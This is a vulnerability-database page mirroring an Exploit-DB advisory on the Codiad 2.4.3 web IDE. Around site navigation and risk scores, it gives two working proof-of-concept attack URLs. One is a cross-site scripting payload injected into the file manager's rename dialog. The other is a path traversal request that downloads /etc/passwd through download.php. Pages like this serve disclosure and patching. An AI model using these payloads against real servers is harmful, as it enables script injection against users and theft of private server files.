Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbTaurusOmarEDB-ID:35585
HistoryDec 19, 2014 - 12:00 a.m.

Codiad 2.4.3 - Multiple Vulnerabilities

2014-12-1900:00:00
TaurusOmar
www.exploit-db.com
393

6.4 Medium

AI Score

Confidence

Low

0.002 Low

EPSS

Percentile

52.9%

JSON
               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                 INDEPENDENT SECURITY RESEARCHER 
                   PENETRATION TESTING SECURITY
               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 

# Exploit Title: Codiad 2.4.3 - Cross Site Scripting - Local File Inclusion Vulnerability's 
# Date: 19/12/2014
# Url Vendor: http://codiad.com/
# Vendor Name: Codiad
# Version: 2.4.3
# CVE:  CVE-2014-1137
# Author: TaurusOmar	
# Tiwtter: @TaurusOmar_
# Email:  [email protected]
# Home:  overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: High

Description
Codiad is a web-based IDE framework with a small footprint and minimal requirements.
Codiad was built with simplicity in mind, allowing for fast, interactive development without the massive overhead of some of the larger desktop editors. That being said even users of IDE's such as Eclipse, NetBeans and Aptana are finding Codiad's simplicity to be a huge benefit. While simplicity was key, we didn't skimp on features and have a team of dedicated developer actively adding more.


------------------------
+ CROSS SITE SCRIPTING + 
------------------------
#Exploiting Description - Get into code xss in next path

/components/filemanager/dialog.php?action=rename&path=3&short_name=

#P0c
http://site.com/components/filemanager/dialog.php?action=rename&path=3&short_name='"><img src=x onerror=prompt(1);>

#Proof Concept
http://i.imgur.com/rr9b42K.jpg


------------------------
+  Local File Incluson +
------------------------
# Exploiting Description - Get into path in ur' browser and download private file server /etc/passwd 

#P0c
http://site.com/components/filemanager/download.php?path=../../../../../../../../../../../etc/passwd&type=undefined

#Proof Concept
http://i.imgur.com/LSm360S.jpg

Related

cvelist 4
zdt 2
exploitpack 2
packetstorm 2
cve 4
nvd 4
prion 4
exploitdb 1
cvelist
cvelist
CVE-2014-1137
2022-10-03 16:20:28
CVE-2014-9445
2015-01-02 20:00:00
CVE-2014-9582
2015-01-08 20:00:00
zdt
zdt
Codiad 2.4.3 Cross Site Scripting / Local File Inclusion Vulnerabilities
2014-12-20 00:00:00
GQ File Manager 0.2.5 Sql Injection / Cross Site Scripting Vulnerabilities
2014-12-20 00:00:00
exploitpack
exploitpack
GQ File Manager 0.2.5 - Multiple Vulnerabilities
2014-12-19 00:00:00
Codiad 2.4.3 - Multiple Vulnerabilities
2014-12-19 00:00:00
packetstorm
packetstorm
Codiad 2.4.3 Cross Site Scripting / Local File Inclusion
2014-12-20 00:00:00
GQ File Manager 0.2.5 Cross Site Scripting / SQL Injection
2014-12-20 00:00:00
cve
cve
CVE-2014-9582
2015-01-08 20:59:01
CVE-2014-9581
2015-01-08 20:59:00
CVE-2014-9445
2015-01-02 20:59:03
nvd
nvd
CVE-2014-9581
2015-01-08 20:59:00
CVE-2014-9582
2015-01-08 20:59:01
CVE-2014-9445
2015-01-02 20:59:03
prion
prion
Sql injection
2015-01-02 20:59:00
Directory traversal
2015-01-08 20:59:00
Cross site scripting
2015-01-08 20:59:00
exploitdb
exploitdb
GQ File Manager 0.2.5 - Multiple Vulnerabilities
2014-12-19 00:00:00

6.4 Medium

AI Score

Confidence

Low

0.002 Low

EPSS

Percentile

52.9%

JSON
Related for EDB-ID:35585
cvelist4zdt2exploitpack2packetstorm2cve4nvd4prion4exploitdb1